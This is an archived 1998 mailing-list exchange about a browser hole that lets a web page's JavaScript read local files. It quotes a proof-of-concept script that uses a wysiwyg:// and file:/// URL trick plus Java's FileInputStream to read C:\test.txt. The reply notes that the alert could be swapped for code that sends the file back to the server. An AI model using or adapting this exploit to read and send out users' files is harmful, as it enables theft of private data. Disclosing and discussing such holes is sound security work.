The demonstration exploit puts your file on screen, but could as easily have passed it back to the server the javascript came from. simply replace alert(b) with appropriate code. Andrew McNaughton On Mon, 23 Nov 1998, Bill Lavalette wrote: > Hi - > this appears to be no different then typing c:\ in the location of any > browser hardly a security hole in my opinion the test site did not > prove that this is a potential or current problem. > > >The Javascript code is: > > > >sl=window.open("wysiwyg://1/file:///C|/"); > >sl2=sl.window.open(); > >sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your > >file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new > >java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) && > >(i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'";
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:24:10 PDT